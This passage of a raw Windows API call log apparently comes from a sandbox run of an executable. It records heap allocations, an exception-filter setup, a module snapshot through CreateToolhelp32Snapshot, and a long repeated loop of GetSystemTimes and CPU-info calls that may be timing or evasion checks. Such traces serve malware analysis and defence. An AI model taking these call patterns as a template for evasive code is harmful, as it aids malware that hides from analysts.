Size=0x1e) returned 0x2051f68 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x41) returned 0x2051f90 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x17) returned 0x2051fe8 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0xf) returned 0x2052008 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x16) returned 0x2052020 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x2a) returned 0x2052040 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x29) returned 0x2052078 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x15) returned 0x20520b0 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x1e) returned 0x20520d0 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x2a) returned 0x20520f8 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x12) returned 0x2052130 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x18) returned 0x2052150 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x46) returned 0x2052170 [0181.742] HeapFree (in: hHeap=0x2050000, dwFlags=0x0, lpMem=0x20511f8 | out: hHeap=0x2050000) returned 1 [0181.744] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x800) returned 0x20521c0 [0181.744] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x80) returned 0x20511f8 [0181.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0181.745] RtlSizeHeap (HeapHandle=0x2050000, Flags=0x0, MemoryPointer=0x20511f8) returned 0x80 [0181.745] GetLastError () returned 0x0 [0181.745] SetLastError (dwErrCode=0x0) [0181.745] GetLastError () returned 0x0 [0181.745] SetLastError (dwErrCode=0x0) [0181.745] GetLastError () returned 0x0 [0181.745] SetLastError (dwErrCode=0x0) [0181.745] GetLastError () returned 0x0 [0181.745] SetLastError (dwErrCode=0x0) [0181.745] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.746] SetLastError (dwErrCode=0x0) [0181.746] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.747] SetLastError (dwErrCode=0x0) [0181.747] GetLastError () returned 0x0 [0181.748] SetLastError (dwErrCode=0x0) [0181.748] GetLastError () returned 0x0 [0181.748] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0181.748] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0181.749] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0181.749] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0181.751] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0181.751] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0181.751] GetTickCount () returned 0x115707f [0181.752] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.752] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.752] GetACP () returned 0x4e4 [0181.752] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.752] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.752] GetACP () returned 0x4e4 [0181.752] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.752] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.752] GetACP () returned 0x4e4 [0181.752] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.752] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.752] GetACP () returned 0x4e4 [0181.752] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.752] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.752] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.753] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.753] GetACP () returned 0x4e4 [0181.753] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.754] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.754] GetACP () returned 0x4e4 [0181.754] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.755] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.755] GetACP () returned 0x4e4 [0181.755] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.756] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.756] GetACP () returned 0x4e4 [0181.756] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.757] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.757] GetACP () returned 0x4e4 [0181.757] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.758] GetACP () returned 0x4e4 [0181.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.759] GetACP () returned 0x4e4 [0181.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.760] GetACP () returned 0x4e4 [0181.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.761] GetACP () returned 0x4e4 [0181.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.761] GetACP () returned 0x4e4 [0181.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.761] GetACP () returned 0x4e4 [0181.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.761] GetACP () returned 0x4e4 [0181.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.761] GetACP () returned 0x4e4 [0181.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.762] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, 